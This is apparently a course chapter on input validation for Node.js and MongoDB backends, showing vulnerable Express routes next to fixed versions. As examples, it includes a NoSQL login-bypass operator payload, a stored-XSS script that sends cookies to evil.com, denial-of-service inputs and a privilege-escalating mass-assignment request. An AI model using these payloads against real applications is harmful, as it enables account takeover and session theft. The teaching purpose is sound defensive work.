Episode 3 — NodeJS MongoDB Backend Architecture / 3.10 — Input Validation
3.10.a — Why Validation Matters
Input validation is the practice of checking data against expected formats, types, and constraints before processing. It protects data integrity, prevents security vulnerabilities, and improves user experience.
1. What Is Input Validation?
Validation is the process of verifying that incoming data meets your application's expectations before it enters your business logic or database.
User Input --> [VALIDATION LAYER] --> Business Logic --> Database
                      |
                      v
               Reject bad data
               with clear errors
Every piece of data that crosses a trust boundary must be validated:
- HTTP request bodies (POST/PUT data)
- URL parameters (/users/:id)
- Query strings (?page=1&limit=10)
- HTTP headers (authorization tokens, content types)
- File uploads (type, size, name)
- Data from external APIs or services
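As a rough illustration of checking more than one of these sources, the sketch below validates a URL parameter and two query-string values in plain JavaScript. The helper name `validateListRequest`, the numeric limits, and the error shape are assumptions made for this example; they do not come from any library.

```javascript
// Hypothetical helper: checks values that arrive from two different request sources.
const OBJECT_ID_PATTERN = /^[0-9a-fA-F]{24}$/; // textual form of a MongoDB ObjectId
const INTEGER_PATTERN = /^\d+$/;

function validateListRequest({ params = {}, query = {} }) {
  const errors = [];

  // URL parameter, e.g. /users/:id
  if (typeof params.id !== 'string' || !OBJECT_ID_PATTERN.test(params.id)) {
    errors.push({ field: 'params.id', message: 'must be a 24-character hex string' });
  }

  // Query-string values are strings, or arrays/objects when a key repeats or uses brackets
  for (const [name, max] of [['page', 10000], ['limit', 100]]) {
    const raw = query[name];
    if (raw === undefined) continue; // both values are optional in this sketch
    const ok = typeof raw === 'string' && INTEGER_PATTERN.test(raw) &&
      Number(raw) >= 1 && Number(raw) <= max;
    if (!ok) {
      errors.push({ field: `query.${name}`, message: `must be an integer between 1 and ${max}` });
    }
  }
  return errors;
}

const good = validateListRequest({
  params: { id: '507f1f77bcf86cd799439011' },
  query: { page: '1', limit: '10' },
});
const bad = validateListRequest({
  params: { id: 'abc' },
  query: { page: '-1', limit: ['10', '20'] },
});
console.log(good.length, bad.length);
```

In an Express app the same function could be called with `req.params` and `req.query`; headers, uploads, and third-party responses would need their own checks.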
2. Data Integrity
Without validation, your database fills with inconsistent, malformed data that breaks downstream systems.
What Goes Wrong
// No validation — anything goes into the database
app.post('/users', async (req, res) => {
const user = await User.create(req.body);
res.json(user);
});
// These all succeed — and they should NOT:
// { email: "not-an-email", age: -5, name: "" }
// { email: 123, age: "old", name: null }
// { unexpectedField: "malicious data" }
Real Consequences
| Problem | Example | Impact |
|---|---|---|
| Wrong type | age: "twenty" instead of age: 20 | Calculations break, sorting fails |
| Missing required fields | No email on a user record | Cannot send notifications, login fails |
| Out-of-range values | quantity: -50 on an order | Inventory goes negative, financial errors |
| Malformed references | userId: "abc" instead of valid ObjectId | Broken joins, orphaned records |
| Duplicate entries | Two accounts with same email | Auth confusion, data leaks |
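Several rows in the table (wrong type, missing field, out-of-range value) can be caught by a small check that runs before `User.create`. The following is a minimal, library-free sketch; `validateUser`, the allowed field list, the loose email pattern, and the age bounds are hypothetical choices for illustration. Malformed references and duplicates need database-aware checks and are not covered here.

```javascript
// Hypothetical validator for the user payloads shown earlier in this section.
const ALLOWED_FIELDS = ['email', 'age', 'name'];
const EMAIL_PATTERN = /^\S+@\S+\.\S+$/; // deliberately loose: something@something.tld

function validateUser(payload) {
  if (payload === null || typeof payload !== 'object' || Array.isArray(payload)) {
    return ['body must be a JSON object'];
  }
  const errors = [];

  // Reject fields the endpoint does not know about
  for (const key of Object.keys(payload)) {
    if (!ALLOWED_FIELDS.includes(key)) errors.push(`unexpected field: ${key}`);
  }
  // Type and format checks
  if (typeof payload.email !== 'string' || !EMAIL_PATTERN.test(payload.email)) {
    errors.push('email must be a valid email address');
  }
  // Type and range checks
  if (!Number.isInteger(payload.age) || payload.age < 0 || payload.age > 150) {
    errors.push('age must be an integer between 0 and 150');
  }
  if (typeof payload.name !== 'string' || payload.name.trim() === '') {
    errors.push('name must be a non-empty string');
  }
  return errors;
}

console.log(validateUser({ email: 'not-an-email', age: -5, name: '' }));
console.log(validateUser({ email: 'ada@example.com', age: 36, name: 'Ada' })); // []
```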
3. Security Threats Without Validation
3.1 SQL/NoSQL Injection
// Without validation — MongoDB injection
app.post('/login', async (req, res) => {
const { username, password } = req.body;
// Attacker sends: { username: { "$gt": "" }, password: { "$gt": "" } }
// This query matches ANY document where username and password exist
const user = await User.findOne({ username, password });
// Attacker is logged in as the first user in the collection
});
// With validation — injection blocked
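const { body, validationResult } = require('express-validator');
const bcrypt = require('bcrypt'); // assumes the bcrypt package is installed

app.post('/login',
  body('username').isString().trim().isLength({ min: 3, max: 30 }),
  body('password').isString().isLength({ min: 8 }),
  async (req, res) => {
    const errors = validationResult(req);
    if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });
    // username and password are guaranteed to be strings now
    const user = await User.findOne({ username: req.body.username });
    // Guard against an unknown username before reading user.password,
    // and compare against the stored hash instead of querying by password
    const isMatch = user ? await bcrypt.compare(req.body.password, user.password) : false;
    if (!isMatch) return res.status(401).json({ error: 'Invalid credentials' });
    res.json({ message: 'Logged in' });
  }
);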
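The type checks above work because a query operator can only be smuggled in as an object. A complementary, library-free guard is to scan the parsed body for keys that start with `$` before it reaches any query. The helper name `containsOperatorKey` is hypothetical, and this is a sketch of the idea rather than a complete sanitizer.

```javascript
// Hypothetical guard: true if any (nested) object key starts with "$",
// which is how MongoDB query operators such as $gt or $ne are spelled.
function containsOperatorKey(value) {
  if (Array.isArray(value)) {
    return value.some(containsOperatorKey);
  }
  if (value !== null && typeof value === 'object') {
    return Object.entries(value).some(
      ([key, nested]) => key.startsWith('$') || containsOperatorKey(nested)
    );
  }
  return false; // strings, numbers, booleans, null, undefined
}

const attack = { username: { $gt: '' }, password: { $gt: '' } };
const normal = { username: 'alice', password: 'correct horse' };

console.log(containsOperatorKey(attack)); // true
console.log(containsOperatorKey(normal)); // false
```

A middleware could respond with 400 whenever `containsOperatorKey(req.body)` is true, leaving the per-field validators to handle everything else.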
3.2 Cross-Site Scripting (XSS)
// Without validation — stored XSS
app.post('/comments', async (req, res) => {
// Attacker sends: { text: "<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>" }
const comment = await Comment.create({ text: req.body.text });
// When other users view this comment, the script executes in their browser
});
// With sanitization — XSS blocked
const { body } = require('express-validator');
app.post('/comments',
body('text').trim().escape().isLength({ min: 1, max: 5000 }),
async (req, res) => {
// .escape() converts < > & " ' to HTML entities
// "<script>" becomes "&lt;script&gt;"
}
);
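To make the effect of escaping concrete, here is a simplified stand-in written in plain JavaScript. It is not express-validator's implementation; the function name `escapeHtml` and the entity table are assumptions that cover only the five characters listed in the comment above.

```javascript
// Simplified illustration of HTML escaping (hypothetical helper, not the library's code).
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

function escapeHtml(text) {
  // Replace each special character with its entity so browsers render it as text
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

console.log(escapeHtml('<script>alert(1)</script>'));
// prints: &lt;script&gt;alert(1)&lt;/script&gt;
```

Once escaped, the payload is displayed as literal text instead of being parsed as a script element.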
3.3 Denial of Service (DoS)
// Without validation — DoS via payload size
app.post('/search', async (req, res) => {
// Attacker sends: { query: "a".repeat(10_000_000) }
// Or: { items: Array(1_000_000).fill("data") }
// Server runs out of memory processing this
const results = await Product.find({ name: new RegExp(req.body.query) });
});
// With validation — payload constrained
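app.post('/search',
  body('query').isString().isLength({ min: 1, max: 200 }),
  body('items').optional().isArray({ max: 100 }),
  async (req, res) => {
    // Validators only record errors; reject here before doing any work.
    // Raw body size is capped earlier by the parser, e.g. express.json({ limit: '100kb' }).
    const errors = validationResult(req);
    if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });
    const results = await Product.find({ name: new RegExp(req.body.query) });
    res.json(results);
  }
);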
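A length limit bounds the size of the input, but the string is still interpreted as a regular expression, so a short pattern with nested quantifiers can remain expensive. One common mitigation, sketched here under the assumption that users should search for literal text, is to escape regex metacharacters before building the pattern. `escapeRegExp`, `buildSearchPattern`, and `MAX_QUERY_LENGTH` are hypothetical names.

```javascript
const MAX_QUERY_LENGTH = 200; // assumed limit, matching the validator above

// Escape characters that have special meaning inside a regular expression
function escapeRegExp(text) {
  return text.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Returns a RegExp that matches the query literally, or null if the input is rejected
function buildSearchPattern(query) {
  if (typeof query !== 'string') return null;
  if (query.length < 1 || query.length > MAX_QUERY_LENGTH) return null;
  return new RegExp(escapeRegExp(query));
}

const pattern = buildSearchPattern('(a+)+$');
console.log(pattern.test('sku (a+)+$ clearance')); // true: matched as literal text
console.log(pattern.test('aaaa'));                 // false: quantifiers are not interpreted
console.log(buildSearchPattern('a'.repeat(201)));  // null: too long
```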
4. Server-Side vs Client-Side Validation
      CLIENT-SIDE                  SERVER-SIDE
┌─────────────────────┐    ┌─────────────────────────┐
│  Quick feedback     │    │  Security enforcement   │
│  Reduces requests   │    │  Data integrity         │
│  Better UX          │    │  Cannot be bypassed     │
│  CAN be bypassed    │    │  Canonical source       │
└─────────────────────┘    └─────────────────────────┘
           │                            │
           └────── BOTH ARE NEEDED ─────┘
| Aspect | Client-Side | Server-Side |
|---|---|---|
| Purpose | UX improvement | Security enforcement |
| Can be bypassed? | Yes (DevTools, curl, Postman) | No |
| Feedback speed | Instant | Requires round-trip |
| Where it runs | Browser (JavaScript) | Server (Node.js) |
| Required? | Nice to have | Absolutely mandatory |
Why Client-Side Alone Is Never Enough
# Anyone can bypass client-side validation with curl:
curl -X POST http://localhost:3000/api/users \
-H "Content-Type: application/json" \
-d '{"email": "not-valid", "age": -999, "role": "admin"}'
# Or with browser DevTools:
# 1. Open Network tab
# 2. Edit and resend any request
# 3. All client-side validation is bypassed
5. Defense in Depth
Validate at every boundary, not just one layer:
┌──────────────────────────────────────────────────────────┐
│ Layer 1: Client-Side Validation (HTML5 + JavaScript) │
│ ┌────────────────────────────────────────────────────┐ │
│ │ Layer 2: API Gateway / Rate Limiting │ │
│ │ ┌──────────────────────────────────────────────┐ │ │
│ │ │ Layer 3: Express Middleware Validation │ │ │
│ │ │ ┌────────────────────────────────────────┐ │ │ │
│ │ │ │ Layer 4: Mongoose Schema Validation │ │ │ │
│ │ │ │ ┌──────────────────────────────────┐ │ │ │ │
│ │ │ │ │ Layer 5: MongoDB Schema Rules │ │ │ │ │
│ │ │ │ └──────────────────────────────────┘ │ │ │ │
│ │ │ └────────────────────────────────────────┘ │ │ │
│ │ └──────────────────────────────────────────────┘ │ │
│ └────────────────────────────────────────────────────┘ │
└──────────────────────────────────────────────────────────┘
// Layer 3: Express middleware validation
const validateRegistration = [
body('email').isEmail().normalizeEmail(),
body('password').isStrongPassword(),
body('age').isInt({ min: 13, max: 120 }),
];
// Layer 4: Mongoose schema validation
const userSchema = new mongoose.Schema({
email: {
type: String,
required: [true, 'Email is required'],
match: [/^\S+@\S+\.\S+$/, 'Invalid email format'],
unique: true, // builds a unique index; not a validator, so duplicates surface as a duplicate-key error
lowercase: true,
trim: true,
},
password: {
type: String,
required: [true, 'Password is required'],
minlength: [8, 'Password must be at least 8 characters'],
},
age: {
type: Number,
min: [13, 'Must be at least 13 years old'],
max: [120, 'Invalid age'],
},
});
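Layer 5 in the diagram has no code above, so here is a hedged sketch of what database-level rules could look like using MongoDB's `$jsonSchema` collection validator. The rules mirror the Mongoose schema by assumption; the variable name `userCollectionOptions` and the collection name `users` are illustrative, and the `createCollection` call is shown only as a comment because it needs a live connection.

```javascript
// Collection options carrying a $jsonSchema validator (sketch; field rules are assumptions).
const userCollectionOptions = {
  validator: {
    $jsonSchema: {
      bsonType: 'object',
      required: ['email', 'password'],
      properties: {
        email: { bsonType: 'string', pattern: '^\\S+@\\S+\\.\\S+$' },
        password: { bsonType: 'string', minLength: 8 },
        // JavaScript numbers may be stored as int, long, or double
        age: { bsonType: ['int', 'long', 'double'], minimum: 13, maximum: 120 },
      },
    },
  },
  validationAction: 'error', // reject writes that violate the schema
};

// With the official Node.js driver this could be applied as:
//   await db.createCollection('users', userCollectionOptions);
console.log(JSON.stringify(userCollectionOptions.validator.$jsonSchema.required));
```

Rules at this layer also apply to writes that bypass Mongoose, such as scripts or other services using the same database.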
6. Validation vs Sanitization
These are related but distinct operations:
| Concept | Purpose | Example |
|---|---|---|
| Validation | Check if data meets rules — accept or reject | Is "hello@email.com" a valid email? |
| Sanitization | Transform data to be safe/clean | Trim whitespace, escape HTML, normalize email |
const { body } = require('express-validator');
app.post('/profile',
// VALIDATION — reject if rules not met
body('email').isEmail(), // Must be valid email
body('age').isInt({ min: 0, max: 150 }), // Must be integer 0-150
body('website').optional().isURL(), // If present, must be URL
// SANITIZATION — transform the data
body('email').normalizeEmail(), // "John@GMAIL.COM" -> "john@gmail.com"
body('name').trim().escape(), // " <b>John</b> " -> tags are escaped to entities (&lt;b&gt;...), not removed
body('age').toInt(), // "25" -> 25
);
Order Matters
// WRONG: sanitize before validate — may hide invalid input
body('age').toInt().isInt({ min: 0 });
// "abc" -> NaN -> fails isInt (works here by luck)
// But: "12abc" -> 12 -> passes isInt (BAD — original input was invalid)
// RIGHT: validate first, then sanitize
body('age').isInt({ min: 0 }).toInt();
// "12abc" -> fails isInt immediately (GOOD)
// "12" -> passes isInt -> converted to number 12
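The same pitfall can be reproduced without any library, since integer conversion in JavaScript is lenient about trailing characters. The sketch below contrasts `parseInt` with a strict check; `parseStrictInt` is a hypothetical helper written for this example.

```javascript
// parseInt stops at the first non-digit and keeps what it has read so far
console.log(Number.parseInt('12abc', 10)); // 12

// Hypothetical strict variant: validate the whole string first, then convert
function parseStrictInt(raw) {
  if (typeof raw !== 'string' || !/^[+-]?\d+$/.test(raw)) {
    return null; // reject instead of guessing
  }
  return Number.parseInt(raw, 10);
}

console.log(parseStrictInt('12abc')); // null
console.log(parseStrictInt('12'));    // 12
console.log(parseStrictInt('abc'));   // null
```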
7. Real-World Validation Failures
Case 1: Mass Assignment Vulnerability
// Dangerous: accepting entire req.body
app.put('/users/:id', async (req, res) => {
await User.findByIdAndUpdate(req.params.id, req.body);
// Attacker sends: { role: "admin", verified: true }
// They just elevated their own privileges
});
// Safe: validate and whitelist fields
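app.put('/users/:id',
  body('name').optional().isString().trim().isLength({ max: 100 }),
  body('bio').optional().isString().trim().isLength({ max: 500 }),
  async (req, res) => {
    // Validators only record errors; reject the request if any rule failed
    const errors = validationResult(req);
    if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });
    const { name, bio } = req.body; // Only extract allowed fields
    await User.findByIdAndUpdate(req.params.id, { name, bio });
    res.sendStatus(204);
  }
);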
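When an endpoint accepts more than a couple of fields, destructuring each one by hand gets tedious. A small allow-list helper is one way to generalize the idea; `pickAllowed` is a hypothetical function for this sketch, not a Mongoose or Express API.

```javascript
// Hypothetical helper: copy only allow-listed, defined fields into a new object.
function pickAllowed(source, allowedFields) {
  const result = {};
  if (source === null || typeof source !== 'object') return result;
  for (const field of allowedFields) {
    const isOwn = Object.prototype.hasOwnProperty.call(source, field);
    if (isOwn && source[field] !== undefined) {
      result[field] = source[field];
    }
  }
  return result;
}

const incoming = { name: 'Ada', role: 'admin', verified: true };
const update = pickAllowed(incoming, ['name', 'bio']);
console.log(update); // { name: 'Ada' }
```

The resulting `update` object could then be passed to `User.findByIdAndUpdate` in place of `req.body`, so `role` and `verified` never reach the database.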
Case 2: Type Coercion Bugs
// JavaScript type coercion creates unexpected behavior
"5" > "12" // true (string comparison: "5" > "1")
"5" > 12 // false (number comparison: 5 > 12)
// Without validation, query parameters are always strings
app.get('/products', async (req, res) => {
// req.query.minPrice is "5" (string), not 5 (number)
// MongoDB compares values by BSON type, so a string "5" sent as-is will not match numeric prices;
// Mongoose casts the value only when the schema declares price as Number
const products = await Product.find({ price: { $gte: req.query.minPrice } });
});
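One way to avoid the problem is to convert the query parameter explicitly and reject anything that is not a clean number before the filter is built. The sketch below is library-free; `parsePriceParam`, `buildPriceFilter`, and the two-decimal rule are assumptions chosen for illustration.

```javascript
// Hypothetical parser: accepts "5" or "5.99", rejects everything else
function parsePriceParam(raw) {
  if (typeof raw !== 'string' || !/^\d+(\.\d{1,2})?$/.test(raw)) return null;
  return Number(raw);
}

// Builds a MongoDB-style filter from req.query-like input
function buildPriceFilter(query) {
  const filter = {};
  if (query.minPrice !== undefined) {
    const minPrice = parsePriceParam(query.minPrice);
    if (minPrice === null) {
      throw new RangeError('minPrice must be a non-negative number');
    }
    filter.price = { $gte: minPrice }; // a real number, not the string "5"
  }
  return filter;
}

const filter = buildPriceFilter({ minPrice: '5' });
console.log(typeof filter.price.$gte); // number
```

A route handler could catch the `RangeError` and answer with a 400 response, then pass the returned filter to `Product.find`.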
Key Takeaways
- Never trust user input — validate everything that crosses a trust boundary
- Server-side validation is mandatory — client-side validation is only for UX
- Validate AND sanitize — validation rejects bad data, sanitization cleans good data
- Defense in depth — validate at every layer (middleware, schema, database)
- Whitelist fields — never pass raw req.body to database operations
- Security threats — injection, XSS, and DoS attacks all exploit missing validation
Explain-It Challenge
Imagine you are building a public API for a banking application. A junior developer suggests that since the mobile app validates all inputs before sending requests, server-side validation is unnecessary. Explain in detail why this reasoning is flawed, what specific attacks could exploit this gap, and design a multi-layer validation strategy for a money transfer endpoint (POST /transfer with recipientId, amount, and note fields).